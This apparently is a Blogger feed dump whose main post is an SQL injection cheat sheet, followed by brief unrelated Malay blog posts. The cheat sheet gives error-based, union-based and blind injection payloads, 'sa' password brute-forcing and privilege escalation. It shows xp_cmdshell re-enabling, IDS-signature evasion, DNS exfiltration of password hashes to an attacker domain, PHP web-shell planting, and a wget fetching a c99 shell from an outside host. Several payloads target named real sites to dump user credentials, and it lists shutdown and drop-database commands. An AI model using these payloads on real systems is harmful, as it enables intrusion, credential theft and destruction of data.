<br />
this is our Error-Based, and Union-Based SQL Injections<br />
http://[site]/page.asp?id=1 or 1=convert(int,(USER))--<br />
Syntax error converting the nvarchar value '[j0e]' to a column of data type int.<br />
<br />
<br />
This is another way of getting the data out of the server (such as http, or dns).<br />
http://[site]/page.asp?id=1;declare @host varchar(800); select @host = name + '-' +<br />
master.sys.fn_varbintohexstr(password_hash) + '.2.pwn3dbyj0e.com' from<br />
sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');--<br />
<br />
<br />
<br />
<br />
The latter case is known as "Blind SQL Injection".<br />
http://[site]/page.asp?id=1;if+not(select+system_user)+<>+'sa'+waitfor+delay+'0:0:5'--<br />
Ask it if it's running as 'sa'<br />
<br />
*********************************************************************************************************<br />
<br />
Determine the Injection Type : integer or string<br />
<br />
Integer Injection:<br />
http://[site]/page.asp?id=1 having 1=1--<br />
Column '[COLUMN NAME]' is invalid in the select list because it is not<br />
contained in an aggregate function and there is no GROUP BY clause.<br />
String Injection:<br />
http://[site]/page.asp?id=x' having 1=1--<br />
Column '[COLUMN NAME]' is invalid in the select list because it is not<br />
contained in an aggregate function and there is no GROUP BY clause.<br />
<br />
<br />
Determining this is what determines if you need a ' or not.<br />
<br />
<br />
*********************************************************************************************************<br />
http://[site]/page.asp?id=1 or 1=convert(int,(USER))--<br />
Syntax error converting the nvarchar value '[DB USER]' to a column of<br />
data type int.<br />
Grab the database user with USER<br />
Grab the database name with DB_NAME<br />
Grab the servername with @@servername<br />
Grab the Windows/OS version with @@version<br />
Error-Based SQL Injection Syntax for<br />
extracting the USER<br />
<br />
<br />
<br />
*********************************************************************************************************<br />
<br />
http://[site]/page.asp?id=1 UNION SELECT ALL 1--<br />
All queries in an SQL statement containing a UNION operator must have an equal number of<br />
expressions in their target lists.<br />
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2--<br />
All queries in an SQL statement containing a UNION operator must have an equal number of<br />
expressions in their target lists.<br />
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3--<br />
All queries in an SQL statement containing a UNION operator must have an equal number of<br />
expressions in their target lists.<br />
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4--<br />
NO ERROR<br />
http://[site]/page.asp?id=null UNION SELECT ALL 1,USER,3,4--<br />
Union-Based SQL Injection Syntax for extracting the USER<br />
<br />
*********************************************************************************************************<br />
<br />
3 - Total Characters<br />
http://[site]/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--<br />
Valid page returns immediately<br />
http://[site]/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--<br />
Valid page returns immediately<br />
http://[site]/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'--<br />
Valid page returns after 10 second delay<br />
Blind SQL Injection Syntax for extracting the USER<br />
<br />
*********************************************************************************************************<br />
<br />
<br />
D - 1st Character<br />
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>97) WAITFOR DELAY '00:00:10'<br />
Valid page returns immediately<br />
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--<br />
Valid page returns immediately<br />
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--<br />
Valid page returns immediately<br />
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'--<br />
Valid page returns after 10 second delay<br />
Blind SQL Injection Syntax for extracting the USER<br />
<br />
B - 2nd Character<br />
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'--<br />
Valid page returns immediately<br />
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds) )<br />
Valid page returns after 10 second delay<br />
<br />
<br />
O - 3rd Character<br />
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'--<br />
Valid page returns immediately<br />
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>98) WAITFOR DELAY '00:00:10'--<br />
Valid page returns immediately<br />
.....and so on<br />
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'--<br />
Valid page returns after 10 second delay<br />
Database User = DBO<br />
<br />
*********************************************************************************************************<br />
http://[site]/page.php?id=null union all select 1,user(),3,4,5/*<br />
http://[site]/page.php?id=null union all select 1,2,database(),4,5/*<br />
http://[site]/page.php?id=null union all select 1,@@version,@@datadir,4,5/*<br />
Grab the database user with user()<br />
Grab the database name with database()<br />
Grab the database version with @@version<br />
Grab the database data directory with @@datadir<br />
Information Gathering<br />
<br />
*********************************************************************************************************<br />
<br />
Error-Based SQL Injection<br />
http://[site]/page.asp?id=2 or 1 in (select @@version)--<br />
Obtaining the version of the OS<br />
http://[site]/page.asp?id=2 or 1 in (select @@servername)--<br />
Obtaining the hostname of the server<br />
http://[site]/page.asp?id=2 or 1 in (select user)--<br />
Obtaining the user<br />
http://[site]/page.asp?id=2 or 1 in (select db_name(N))--<br />
Obtaining the database name(s). N = start with 0 and keep incrementing<br />
Basic SQLI Attack Methods<br />
<br />
<br />
<br />
<br />
<br />
*********************************************************************************************************<br />
<br />
Union-Based SQL Injection<br />
http://[site]/page.asp?id=1 UNION SELECT ALL 1--<br />
All queries in an SQL statement containing a UNION operator must have an equal number<br />
of expressions in their target lists.<br />
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2--<br />
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3--<br />
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4--<br />
NO ERROR<br />
You should receive the error with each request, errors not shown to make room for the<br />
slide<br />
Basic SQLI Attack Methods<br />
<br />
<br />
<br />
*********************************************************************************************************<br />
<br />
True-False Blind SQL Injection<br />
http://www.site.com/page.php?id=66 AND 1=1-- Valid Page<br />
http://www.site.com/page.php?id=66 AND 1=2-- Error Page<br />
http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 1, 1)) > 51 3<br />
http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 1, 1)) > 53 5<br />
http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 1, 1)) > 52 4<br />
http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 2, 1)) > 43 +<br />
http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 2, 1)) > 45 -<br />
http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 2, 1)) > 46 .<br />
http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 3, 1)) > 51 3<br />
http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 3, 1)) > 49 1<br />
http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 3, 1)) > 48 0<br />
MID() Extract characters from a text field<br />
retrieved version: 5.0.45<br />
Basic SQLI Attack Methods<br />
<br />
<br />
*********************************************************************************************************<br />
<br />
<br />
Time-Based Blind SQL Injection<br />
http://[site]/page.asp?id=1;waitfor+delay+'0:0:5';--<br />
See if it takes 5 seconds to return the page. If it does, then you can ask it questions.<br />
http://[site]/page.asp?id=1;if+not(substring((select+@@version),%,1)+<>+5)+waitfor<br />
+delay+'0:0:5';--<br />
Ask it if he is running SQL Server 2000<br />
http://[site]/page.asp?id=1;if+not(select+system_user)+<>+'sa'+waitfor+delay+'0:0:5'--<br />
Ask it if it's running as 'sa'<br />
http://[site]/page.asp?id=1;if+is_srvrolemember('sysadmin')+>+0+waitfor+delay+'0:0:5';--<br />
Ask it if the current user a member of the sysadmin group<br />
Basic SQLI Attack Methods<br />
<br />
<br />
<br />
*********************************************************************************************************<br />
<br />
http://www.http://www.liljon.com/liljon.asp?lil='<br />
Gives the error:<br />
Microsoft OLE DB Provider for SQL Server error '80040e14'<br />
http://www.liljon.com/liljon.asp?lil=71%20or%201=convert(int,(USER))--<br />
Gives the error:<br />
Microsoft OLE DB Provider for SQL Server error '80040e14'<br />
Incorrect syntax near ')'.<br />
Hmm....ok, so it doesn't like that right paren so let's add one more to the end of our query.<br />
http://www.liljon.com/liljon.asp?lil=71%20or%201=convert(int,(USER)))--<br />
Gives the error:<br />
Microsoft OLE DB Provider for SQL Server error '80040e07'<br />
Conversion failed when converting the nvarchar value 'liljon' to data type int.<br />
Now we know every injection from here on out will require the additional right paren....<br />
@@servername()), @@version()), db_name()), etc....<br />
UGGGGHHH.....WTF??? (1)<br />
<br />
<br />
http://www.liljon.com/liljon.asp?lil=71%20or%201=convert(int,(DB_NAME())))-<br />
Gives the error:<br />
Conversion failed when converting the nvarchar value 'yeaaaaaah' to data type int.<br />
http://www.liljon.com/liljon.asp?lil=71%20or%201=convert(int,(@@VERSION)))-<br />
Gives the error:<br />
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3054.00 (Intel X86) Mar 23<br />
2007 16:28:52 Copyright (c) 1988-2005 Microsoft Corporation Workgroup Edition on Windows NT 5.2 (Build 3790:<br />
Service Pack 2) ' to data type int.<br />
UGGGGHHH.....WTF??? (1) Cont.<br />
*********************************************************************************************************<br />
<br />
http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201--<br />
http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2--<br />
Received error: The text, ntext, or image data type cannot be selected as DISTINCT.<br />
http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text,'HELLO')--<br />
http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text,'HELLO'),4--<br />
http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text,'HELLO'),4,5--<br />
http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text,'HELLO'),4,5,6--<br />
http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text,'HELLO'),4,5,6,7--<br />
http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text,'HELLO'),4,5,6,7,8--<br />
http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text,'HELLO'),4,5,6,7,8,9--<br />
Received error: Operand type clash: text is incompatible with int<br />
http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text,'HELLO'),4,5,6,7,8,null--<br />
Tips:<br />
1. Always use UNION with ALL because of image similiar non-distinct field types. By default union tries to get records<br />
with distinct.<br />
2. Use NULL in UNION injections for most data type instead of trying to guess string, date, integer<br />
UGGGGHHH.....WTF??? (2)<br />
<br />
*********************************************************************************************************<br />
<br />
Step 1: Brute-Force the 'sa' password<br />
http://[site]/page.asp?id=1;select * from OPENROWSET('SQLOLEDB','';'sa';'JOE','waitfor<br />
delay ''0:0:50'';select 1;');&a=1<br />
http://[site]/page.asp?id=1;select * from OPENROWSET('SQLOLEDB','';'sa';'joe','waitfor<br />
delay ''0:0:50'';select 1;');&a=1<br />
http://[site]/page.asp?id=1;select * from OPENROWSET('SQLOLEDB','';'sa';'j0e','waitfor<br />
delay ''0:0:50'';select 1;');&a=1<br />
Key point to remember is that we used time-based blind sqli to enumerate the sa account<br />
password length. This is a great aid in bruteforcing.<br />
Privilege Escalation<br />
<br />
<br />
<br />
Step 2: Add current user to admin group<br />
http://[site]/page.asp?id=1;select * from OPENROWSET('SQLOLEDB','';'sa';'j0e','exec<br />
master..sp_addsrvrolemember ''sa'',''sysadmin'';select 1');&a=1<br />
Key point to remember is that we used time-based blind sqli to enumerate the sa account<br />
password length. This is a great aid in bruteforcing.<br />
*********************************************************************************************************<br />
<br />
<br />
Step 3: Recreate the xp_cmdshell stored procedure<br />
MSSQL Server 2000<br />
http://[site]/page.asp?id=1;select * from OPENROWSET('SQLOLEDB','';'sa';'j0e','select<br />
1;exec master..sp_dropextendedproc ''xp_cmdshell'';')&a=1<br />
http://[site]/page.asp?id=1;select * from OPENROWSET('SQLOLEDB','';'sa';'j0e','select<br />
1;DECLARE @result int,@OLEResult int,@RunResult int,@ShellID int EXECUTE<br />
@OLEResult=sp_OACreate ''WScript.Shell'',@ShellID OUT IF @OLEResult<>0 SELECT<br />
@result=@OLEResult IF @OLEResult<>0 RAISERROR(''CreateObject %0X'',<br />
14,1,@OLEResult) EXECUTE @OLEResult=sp_OAMethod @ShellID,''Run'',Null,''ping -n 8<br />
127.0.0.1'',0,1IF @OLEResult<>0 SELECT @result=@OLEResult IF @OLEResult<>0<br />
RAISERROR (''Run %0X'',14,1,@OLEResult) EXECUTE @OLEResult=sp_OADestroy<br />
@ShellID');&a=1<br />
Remember to correctly identify the backend version as this step because MS SQL 2000<br />
handle this differently than MS SQL 2005<br />
Privilege Escalation<br />
<br />
<br />
<br />
*********************************************************************************************************<br />
<br />
Step 3: Recreate the xp_cmdshell stored procedure (What's really going on?)<br />
select * from OPENROWSET('SQLOLEDB','';'sa';'j0e','select 1;<br />
DECLARE @result int,@OLEResult int,@RunResult int,@ShellID int<br />
EXECUTE @OLEResult=sp_OACreate ''WScript.Shell'',@ShellID OUT IF @OLEResult<>0<br />
SELECT @result=@OLEResult IF @OLEResult<>0 RAISERROR(''CreateObject%0X'',14,1,@OLEResult)<br />
EXECUTE @OLEResult=sp_OAMethod @ShellID,''Run'',Null,''ping -n 8 127.0.0.1'',0,1IF @OLEResult<>0<br />
SELECT @result=@OLEResult IF @OLEResult<>0<br />
RAISERROR (''Run %0X'',14,1,@OLEResult) EXECUTE @OLEResult=sp_OADestroy @ShellID');&a=1<br />
Privilege Escalation<br />
<br />
*********************************************************************************************************<br />
<br />
Step 3: Recreate the xp_cmdshell stored procedure<br />
MSSQL Server 2005 (re-enabling xp_cmdshell)<br />
http://[site]/page.asp?id=1;select * from OPENROWSET('SQLOLEDB','';'sa';'j0e','select<br />
1;exec master..sp_configure ''show advanced options'',1;reconfigure;exec<br />
master..sp_configure ''xp_cmdshell'',1;reconfigure')&a=1<br />
http://[site]/page.asp?id=1;exec master..sp_configure 'show advanced options',<br />
1;reconfigure;exec master..sp_configure 'ole automation procedures',1;reconfigure;&a=1<br />
Privilege Escalation<br />
<br />
*********************************************************************************************************<br />
<br />
Server-side Alphanumeric Filter<br />
http://[site]/page.asp?id=2 or 1 like 1<br />
Here we are doing an “or true,” although this time we are using the “like”<br />
comparison instead of the “=” sign. We can use this same technique for the other<br />
variants such as “and 1 like 1” or “and 1 like 2”<br />
http://[site]/page.asp?id=2 and 1 like 1<br />
http://[site]/page.asp?id=2 and 1 like 2<br />
Restrictive Blacklist<br />
<br />
<br />
Bypass Techniques:<br />
http://[site]/page.asp?id=2 or 2=2--<br />
http://[site]/page.asp?id=2 or 1<2--<br />
http://[site]/page.asp?id=2 or 1 like 1--<br />
http://[site]/page.asp?id=2 /**/or /**/2/**/=/**/2--<br />
....c'mon everyone name some more<br />
<br />
<br />
<br />
<br />
*********************************************************************************************************<br />
<br />
Signature 2<br />
alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: “SQL Injection attempt”;<br />
flow: to_server, established; pcre: “/(and|or) 1=1 (\-\-|\/\*|\#)/i”; sid: 1; rev:2;)<br />
Bypass Techniques:<br />
http://[site]/page.asp?id=2 or 2=2%2D%2D<br />
http://[site]/page.asp?id=2 or 1<2%2D%2D<br />
http://[site]/page.asp?id=2 or 1 like 1%2D%2D<br />
http://[site]/page.asp?id=2 /**/or /**/2/**/=/**/2%2D%2D<br />
....c'mon everyone name some more<br />
Signature Negatives<br />
- 1=1 is not the only way to create a query that returns "true" (ex: 2=2, 1<2, etc)<br />
- Comments like pretty much anything else can be represented in other encoding type<br />
(ex: (%2D%2D = --)<br />
- It is possible to attack an sql injection vulnerability without using comments<br />
If this signature is so easily bypassed, what is it actually good for?<br />
Answer:<br />
Again, it's great for automated tools and kiddies<br />
Signature Based IDS (2)<br />
<br />
<br />
<br />
*********************************************************************************************************<br />
<br />
Signature 3-5<br />
alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: “SQL Injection SELECT<br />
statement”; flow: to_server, established; pcre:”/select.*from.*(\-\-|\/\*|\#)/i”; sid: 2; rev: 1;)<br />
<br />
alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: “SQL Injection UNION<br />
statement”; flow: to_server, established; pcre:”/union.*(\-\-|\/\*|\#)/i”; sid: 3; rev: 1;)<br />
Bypass Techniques:<br />
http://[site]/page.asp?id=2 or 2 in (%73%65%6C%65%63%74%20%75%73%65%72)%2D%2D<br />
http://[site]/page.asp?id=2 or 2 in (select user)--<br />
http://[site]/page.asp?id=-2 %55%4E%49%4F%4E%20%41%4C%4C%20%73%65%6C%65%63%74%201,2,3,(%73%65%6C<br />
%65%63%74%20%75%73%65%72),5,6,7%2D%2D<br />
http://[site]/page.asp?id=-2 UNION ALL select 1,2,3,(select user),5,6,7--<br />
....c'mon everyone name some more<br />
Signature Negatives<br />
- Although sigs 3-5 are much better, they don't consider the attacker may use different encoding types such as hex<br />
Signature Based IDS (3-5)<br />
<br />
<br />
<br />
<br />
*********************************************************************************************************<br />
<br />
Signature 6<br />
alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: “SQL Injection SELECT statement”; flow: to_server,<br />
established; pcre:”/(s|%73)(e|%65)(l|%6C)(e|%65)(c|%63)(t|%74).*(f|%66)(r|%72)(o|%6F)(m|%6D).*(\-\-|\/\*|\#)/i”; sid: 2; rev2<br />
Signature 7<br />
alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: “SQL Injection SELECT statement”; flow: to_server,<br />
established; pcre:”/(s|%73|%53)(e|%65|%45)(l|%6C|%4C)(e|%65|%45)(c|%63|%43)(t|%74|%45).*(f|%66|%46)(r|%72|%52)(o|<br />
%6F|%4F)(m|%6D|%4D).*(\-\-|\/\*|\#)/i”; sid: 2; rev: 3;)<br />
At least signature 7 takes into account case sensitivity with hex encoding.<br />
But.....<br />
There are always other encoding types that the attacker can use...<br />
Signature Based IDS (6-7)<br />
<br />
<br />
<br />
*********************************************************************************************************<br />
http://[site]/page.asp?id=2%20or%202%20in%20(/*IDS*/%73/*evasion*/%65/*is*/<br />
%6C/*easy*/%65/*just*/%63/*ask*/%74/*j0e*/%20%75/*to*/%73/*teach*/%65/*you*/<br />
%72/*how*/)%2D%2D<br />
What is passed to the db<br />
http://[site]/page.asp?id=2 or 2 in (select user)--<br />
in comments ("IDS evasion is easy just ask j0e to teach you how")<br />
<br />
<br />
*********************************************************************************************************<br />
bypass filter words<br />
/* !________ */<br />
http://www.marmoon.com/games.php?id=437%20/*!ORDER%20BY*/%2013--<br />
<br />
http://coffeagame.com/top.php?otsi=null' union select 1,unhex(hex(group_concat(m_kasutaja,0x3a,m_parool))),3,4,5,6,7,8,9,10,11,12,13,1 ?4,15 from coffea.user_table-- f<br />
<br />
http://iri.iiu.edu.pk/index.php?page_id=7+and+1=2+union+select+1,2,0x417474656d7074696e6720746f204861636b,4,5,group_concat(0x3c62723e3c62723e,user_name,0x3c62723e3c62723e,user_email,0x3c62723e3c62723e,user_pass_str,0x3c62723e3c62723e,user_pass,0x3c62723e3c62723e,user_type,0x3c62723e3c62723e+separator+0x20),7,8,9,10,11+from+user<br />
<br />
<br />
http://www.techniques.com.pk/index.php?cat_id=3+and+1=3+union+all+select+1,group_concat(0x4841434b454420425920544543484e4f,0x3c62723e3c62723e,login,0x3c62723e3c62723e,password),3,0x4841434b454420425920544543484e4f,5,6,7,8,0x56554c4e455241424c4520544f2053514c20494e4a454354494f4e532e2046495820495420475559532021213c62723e3c62723e203a50203c62723e425945202121,10,11,12,13+from+techniqu_techniq.tbladmin<br />
<br />
<br />
http://www.maimonides.org/upper/newsDetail.php?id=170+and+1=3+union+all+select+1,group_concat(0x3c62723e3c62723e,username,0x3c62723e3c62723e,pwd,0x3c62723e3c62723e,email,0x3c62723e3c62723e+separator+0x3c62723e),3,4,5,6,7,8,9,10+from+users<br />
<br />
<br />
http://www.fpcci.com.pk/news1/display_newsDetail.asp?newsid=1000+and+1=3+union+all+select+1,2,3,4,5,password,name,8,9,10,11,12,13,14,15+from+admin<br />
<br />
http://site.com/index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--<br />
<br />
<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>http://site.com/index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--<br />
<br />
<br />
http://www.commercial.southernrailway.go...8+and+1=0+ Union Select 1 ,2,concat(table_name,0x3a,column_name),4,5,6,7+from+information_schema.columns+where+table_schema=database()--<span class="Apple-tab-span" style="white-space: pre;"> </span><br />
<br />
*********************************************************************************************************<br />
bsqli<br />
<br />
http://www.maimonides.org/upper/newsDetail.php?id=170/**/and/**/ascii(substring((select/**/concat(id,0x3a,username,0x3a,pwd,0x3a,email)/**/from/**/users/**/limit/**/[row],1),[+],1))=[char]--<br />
<br />
<br />
*********************************************************************************************************<br />
injecting shell<br />
<br />
.php?id=-1+union+select+1,2,3,4,5,'<?php @system($_REQUEST["cmd"]); ?>',6,7,8+INTO+DUMPFILE+'/home/username/public_html/images/shell.php'<br />
<br />
You will need to know document root eg. /home/username/public_html and to find any writeable directory on it to inject your shell. Than you navigate to your shell and type http://www.site.com/images/shell.php?cmd=ls<br />
<br />
.php?id=-1 union select 1,2,'your shell code here',4,5,6,7,8 INTO DUMPFILE '/document/root/folder/shell.php'<br />
<br />
Maybe you will need to HEX this 'your shell code here' and this '/document/root/folder/shell.php' or CHAR().<br />
*********************************************************************************************************<br />
php?cmd=wget http://www.localroot.net/c99ud.txt -O c99.php so don't need to put all path cause the c99.php file will be created in the directory where you created your cmd shell.<br />
<br />
<br />
*********************************************************************************************************<br />
thedomain.com:2082<br />
thedomain.com:2083<br />
thedomain.com/admin<br />
admin.thedomain.com<br />
cpanel.thedomain.com<br />
<br />
<br />
<br />
*********************************************************************************************************<br />
In most cases there is no need to have all those symbols. + or /**/ or () for space is enough.<br />
<br />
<br />
*********************************************************************************************************<br />
<br />
Exploit:<br />
If the value of $email is aaa@aaa.com' OR 1=1 INTO OUTFILE'/<directory-path>/pass.txt, the SQL request becomes:<br />
select passmd5 from people where email=' aaa@aaa.com' OR 1=1 INTO OUTFILE'/<directory-path>/pass.txt'<br />
<br />
Resulting in the passwords of the users being written into the file pass.txt.<br />
<br />
<br />
*********************************************************************************************************<br />
http://[site]/page.asp?id=1'a<br />
<br />
<br />
http://foo/web.php?table=38 - We get normal screen<br />
http://foo/web.php?table=38/*%20s*/ - We get normal screen<br />
http://foo/web.php?table=38/*!%20s*/ - We get a different screen because syntax error in comments - MySQL is in use<br />
http://foo/web.php?table=38/*!30000%20s*/ - We get a different screen, MySQL is at least 3.x.x<br />
http://foo/web.php?table=38/*!40000%20s*/ - We get a different screen, MySQL is at least 4.x.x<br />
http://foo/web.php?table=38/*!50000%20s*/ - We get normal screen, MySQL is below 5.x.x<br />
http://foo/web.php?table=38/*!40020%20s*/ - We get normal screen, MySQL is below 4.0.20<br />
http://foo/web.php?table=38/*!40017%20s*/ - We get a different screen, MySQL is at least 4.0.17<br />
http://foo/web.php?table=38/*!40018%20s*/ - We get normal screen, MySQL is below 4.0.18<br />
<br />
<br />
Starting scan for vuln in parameter id.<br />
<br />
1) mysite.com/index.php?id=1+and+1=1 (true and true = true)<br />
<br />
If u see page like with parameter id=1, maybe u have vuln parameter.<br />
<br />
mysite.com/index.php?id=1+and+1=2 (true and false = false)<br />
If u see empty page or error or redirect it says that u have vuln parameter<br />
<br />
2) mysite.com/index.php?id=1'+and+'1'='1 (true and true = true)<br />
mysite.com/index.php?id=1'+and+'1'='2 (true and false = false)<br />
<br />
3) mysite.com/index.php?id=1"+and+"1"="1 (true and true = true)<br />
mysite.com/index.php?id=1"+and+"1"="2 (true and false = false)<br />
<br />
4) mysite.com/index.php?id=1+order+by+1+--+<br />
mysite.com/index.php?id=1+order+by+1000+--+<br />
If u see empty page or error or redirect it says that u have vuln parameter<br />
<br />
5) mysite.com/index.php?id=1<br />
mysite.com/index.php?id=2-1<br />
<br />
6) mysite.com/index.php?id=1<br />
mysite.com/index.php?id=1*1<br />
<br />
7) mysite.com/index.php?id=<br />
If u see empty page or error or redirect it says that u have vuln parameter<br />
<br />
8) mysite.com/index.php?id=1'<br />
If u see empty page or error or redirect it says that u have vuln parameter<br />
<br />
9) mysite.com/index.php?id=1hello<br />
"Unknown column '1hello' in 'where clause" vuln<br />
<br />
10) site.com/index.php?id=1)/*<br />
<br />
11) site.com/index.php?id=1')--+<br />
<br />
12) site.com/index.php?id=1"/*<br />
<br />
13)site.com/index.php?id=1))--+<br />
<br />
<br />
Vuln parameters are not only parameters like "index.php?id=1:<br />
<br />
Code: [Select]<br />
mysite.com/index.php/id/6/<br />
mysite.com/index.HTM?id=1<br />
<br />
*********************************************************************************************************<br />
.asp?xxx=2 union select name from sysobjects where xtype='u'<br />
<br />
.asp?xxx=Select name from syscolumns where id=(select id from sysobjects where<br />
name=‘table’)<br />
<br />
<br />
=2‘ union<br />
select card_number from%20 bank_cards where '1'='1’<br />
<br />
=2; shutdown<br />
<br />
=2; drop database xxx<br />
<br />
*********************************************************************************************************<br />
<br />
<br />
<br />
*********************************************************************************************************<br />
<br />
<br />
<br />
*********************************************************************************************************<br />
<br />
<br />
<br />
*********************************************************************************************************<br />
<br />
<br />
<br />
<br />
*********************************************************************************************************<br />
<br />
<br />
<br />
*********************************************************************************************************<br />
<br />
<br />
<br />
*********************************************************************************************************<br />
<div><br />
</div><i></i>Adios TDhttp://www.blogger.com/profile/00071510321782940313noreply@blogger.com1tag:blogger.com,1999:blog-5159176994329752150.post-78347314061880167452011-12-13T05:19:00.000+08:002011-12-13T05:19:31.917+08:00ne-west?Haha...sje jek update blog nie...da bersawang lak...hihi...<br />
sory k sbb lme da xreleased tutorial....skunk nie tgh sibuk dgn poli la...hurmm...agk ssh skit...<br />
xpe2....adios akn released tutorial xlme ag k....it about hacking FB....hehe.... :)Adios TDhttp://www.blogger.com/profile/00071510321782940313noreply@blogger.com0tag:blogger.com,1999:blog-5159176994329752150.post-53615513313341108432011-11-02T20:22:00.000+08:002011-11-02T20:22:19.395+08:00iklan mengarut :D<div style="text-align: center;"><br />
</div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD0FHFGUYL_pW0_n5gaDxwRousuAtwUgj4ni9950sux5Jfwe3NHwRocoRoRjCN0AUiTaqi0THAD0BrZz0eFIt6RmG3Wq7ZRX1Qf0UlpSfxO1yhPathM43BjT-HSTuA1K7dMv_wPLcx1tPP/s1600/transparan-jpg.jpeg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD0FHFGUYL_pW0_n5gaDxwRousuAtwUgj4ni9950sux5Jfwe3NHwRocoRoRjCN0AUiTaqi0THAD0BrZz0eFIt6RmG3Wq7ZRX1Qf0UlpSfxO1yhPathM43BjT-HSTuA1K7dMv_wPLcx1tPP/s320/transparan-jpg.jpeg" width="225" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b><span class="Apple-style-span" style="font-size: small;">Gambar nie xd kaitan :D</span></b></td></tr>
</tbody></table><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b>lol..</b></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b>nk taw npe...</b></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b>jom tgk video nie....</b></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b><br />
</b></span></div><div class="separator" style="clear: both; text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/MlHLZNKwCL8?feature=player_embedded' frameborder='0'></iframe></b></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b><br />
</b></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b>Almarhum Hary Rusli mempromosikan kondom sebagai alat kesihatan...</b></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b><br />
